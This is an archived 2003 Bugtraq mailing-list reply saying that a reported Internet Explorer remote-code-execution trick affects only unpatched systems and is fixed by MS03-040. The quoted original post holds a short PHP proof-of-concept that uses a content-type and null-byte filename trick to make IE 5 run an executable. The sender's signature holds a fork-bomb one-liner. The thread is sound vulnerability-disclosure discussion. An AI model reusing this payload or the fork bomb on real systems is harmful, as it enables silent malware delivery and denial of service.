lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Mon, 20 Oct 2003 11:42:35 -0700
From: "Thor Larholm" <thor@...x.com>
To: "Marcin Ulikowski" <r3b00t@...pl>, <bugtraq@...urityfocus.com>
Subject: RE: IE remote code execution


A default Windows 98SE installation is several years behind in patches.

This does not reproduce on any IE browser that has been patched the last
year or so.

If in doubt about your IE patch level apply the latest cumulative patch
MS03-040, which can be found at

http://www.microsoft.com/technet/security/bulletin/MS03-040.asp


Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher
http://pivx/com/larholm/ - Get our research, join our mailinglist

-----Original Message-----
From: Marcin Ulikowski [mailto:r3b00t@...pl] 
Sent: Saturday, October 18, 2003 3:16 PM
To: bugtraq@...urityfocus.com
Subject: IE remote code execution


This code can execute any code remotely using IE - as  you can see very
simple.

// for IE 5, tested on default Windows 98SE installation
<?php
Header("Content-type: audio/midi");
Header("Content-Disposition: inline; filename=readme.txt%00code.exe");
readfile("code.exe"); ?> <noscript>

Here you have a demo:
http://r3b00t.tx.pl/iexec5.php

Can we expect more surprises like this one?

--
------------------------------
r3b00t ~ [http://r3b00t.tx.pl]
just do main(){for(;;)fork();}
------------------------------



Powered by blists - more mailing lists